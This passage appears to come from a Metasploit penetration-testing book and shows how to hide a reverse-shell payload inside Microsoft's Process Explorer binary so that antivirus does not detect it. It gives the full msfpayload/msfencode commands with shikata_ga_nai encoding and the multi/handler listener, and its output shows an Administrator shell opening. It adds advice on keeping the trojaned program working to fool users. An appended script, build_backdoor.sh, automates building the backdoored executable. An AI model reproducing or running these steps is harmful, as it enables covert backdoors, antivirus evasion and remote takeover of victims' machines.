Avoiding Detection
Custom Executable Templates
Typically, when msfencode is run, the payload is embedded into the default executable template at data/templates/template.exe. Although this template is changed on occasion, antivirus vendors still look for it when building signatures. However, msfencode now supports the use of any Windows executable in place of the default executable template via the -x option. In the following example, we encode our payload again, this time using Process Explorer from Microsoft's Sysinternals Suite as a custom executable template.
root@bt:/opt/framework3/msf3# wget http://download.sysinternals.com/Files/ProcessExplorer.zip
. . . SNIP . . .
2011-03-21 17:14:46 (119 KB/s) - 'ProcessExplorer.zip' saved [1615732/1615732]
root@bt:/opt/framework3/msf3# cd work/
root@bt:/opt/framework3/msf3/work# unzip ../ProcessExplorer.zip
Archive: ../ProcessExplorer.zip
  inflating: procexp.chm
  inflating: procexp.exe
  inflating: Eula.txt
root@bt:/opt/framework3/msf3/work# cd ..
root@bt:/opt/framework3/msf3# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=5)
First we download Process Explorer from Microsoft and unzip it into the work directory. Then we use the -x switch to specify the downloaded Process Explorer binary, work/procexp.exe, as our custom template; each of the five shikata_ga_nai iterations grows the payload by 27 bytes, and the encoded result is written into a copy of that binary at /var/www/pe_backdoor.exe. After encoding completes, we start up the multi-handler through msfcli to listen for the incoming connection, as shown here:
root@bt:/opt/framework3/msf3# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.101:8080
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:8080 -> 192.168.1.195:1191)
C:\Documents and Settings\Administrator\My Documents\Downloads>
And voilà: we have successfully opened a shell without being detected by antivirus software. Two practical notes: this result reflects the antivirus signatures current when the test was run, so retest the backdoored binary against the target's antivirus product before relying on it; and by default the payload replaces the template's original behavior, so pe_backdoor.exe will not actually launch Process Explorer. If the binary must still behave like the original program in front of the user, add msfencode's -k option, which keeps the template working and runs the payload in a new thread.
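The procedure above, wrapped in a script with the pre-flight checks a tester would want before handing out a template-backdoored binary. This is an added example, not code from the book or from the Metasploit project. It assumes the Metasploit 3 layout used in the text (msfpayload and msfencode on PATH, the stock template at data/templates/template.exe under MSF_ROOT) and that the custom template is an uncompressed 32-bit PE, as procexp.exe is in the text; the function and variable names are my own.

```shell
#!/bin/sh
# build_backdoor.sh (added example, not from the book): validate the custom
# template, run the msfpayload | msfencode pipeline from the text, and print
# the matching msfcli handler command.
# Assumed layout: MSF_ROOT defaults to the /opt/framework3/msf3 tree used in
# the text; the stock template lives at data/templates/template.exe under it.

MSF_ROOT="${MSF_ROOT:-/opt/framework3/msf3}"

# msfencode -x needs a real PE file; every PE starts with the DOS "MZ" magic.
is_pe_file() {
  f="$1"
  [ -f "$f" ] || return 1
  [ "$(head -c 2 "$f" 2>/dev/null)" = "MZ" ]
}

# Refuse the stock template: that file is exactly what AV vendors signature.
# Returns 1 (not the default) when the stock template cannot be found.
is_default_template() {
  f="$1"
  default="$MSF_ROOT/data/templates/template.exe"
  [ -f "$default" ] || return 1
  [ "$(sha256sum "$f" | cut -d' ' -f1)" = "$(sha256sum "$default" | cut -d' ' -f1)" ]
}

# A TCP port is a decimal integer in 1..65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The exact pipeline from the text, parameterized, printed for the record.
encode_cmd() {
  lhost="$1"; lport="$2"; template="$3"; out="$4"; iters="${5:-5}"
  printf 'msfpayload windows/shell_reverse_tcp LHOST=%s LPORT=%s R | msfencode -t exe -x %s -o %s -e x86/shikata_ga_nai -c %s\n' \
    "$lhost" "$lport" "$template" "$out" "$iters"
}

# The msfcli multi/handler invocation that matches the payload above.
handler_cmd() {
  printf 'msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=%s LPORT=%s E\n' "$1" "$2"
}

# Run the encode stage directly (no eval on user-supplied paths).
run_encode() {
  lhost="$1"; lport="$2"; template="$3"; out="$4"; iters="${5:-5}"
  msfpayload windows/shell_reverse_tcp "LHOST=$lhost" "LPORT=$lport" R \
    | msfencode -t exe -x "$template" -o "$out" -e x86/shikata_ga_nai -c "$iters"
}

# Usage: build_backdoor.sh LHOST LPORT TEMPLATE OUTPUT
main() {
  lhost="$1"; lport="$2"; template="$3"; out="$4"
  valid_port "$lport"    || { echo "bad LPORT: $lport" >&2; return 2; }
  is_pe_file "$template" || { echo "not a PE file: $template" >&2; return 2; }
  if is_default_template "$template"; then
    echo "refusing the stock template $template; AV signatures cover it" >&2
    return 2
  fi
  echo "running: $(encode_cmd "$lhost" "$lport" "$template" "$out")" >&2
  run_encode "$lhost" "$lport" "$template" "$out" || return 1
  # A shell pipeline only reports msfencode's status; check the artifact too.
  is_pe_file "$out" || { echo "msfencode produced no PE at $out" >&2; return 1; }
  echo "backdoored binary written to $out; start the listener with:" >&2
  handler_cmd "$lhost" "$lport" >&2
}

# Only run when invoked with arguments, so the functions can also be sourced.
if [ $# -eq 4 ]; then
  main "$@"
fi
```

Invoked as `sh build_backdoor.sh 192.168.1.101 8080 work/procexp.exe /var/www/pe_backdoor.exe` it reproduces the session in the text; the checks fail fast on a non-PE template, on the stock template that antivirus vendors already signature, and on an encode run that produced no output file.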